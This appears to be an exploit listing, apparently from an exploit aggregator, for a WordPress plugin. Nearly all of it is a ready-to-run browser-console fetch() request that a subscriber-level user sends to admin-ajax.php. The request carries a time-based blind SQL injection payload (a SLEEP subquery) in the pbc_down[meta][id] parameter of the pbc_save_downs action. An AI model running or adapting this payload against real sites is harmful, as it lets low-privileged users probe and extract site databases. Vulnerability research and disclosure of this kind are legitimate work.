Share
## https://sploitus.com/exploit?id=WPEX-ID:C89EAE1A-B8D8-4AF1-BD6D-5A9A326FAAD6
Run the below command in the developer console of the web browser while being on the blog as subscriber user

fetch("/wp-admin/admin-ajax.php", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded",
  },
  "method": "POST",
  "body": 'action=pbc_save_downs&pbc_down[meta][id]=1+OR+(SELECT+1+FROM+(SELECT(SLEEP(1)))a)--',
  "credentials": "include"
}).then(response => response.text())
  .then(data => console.log(data));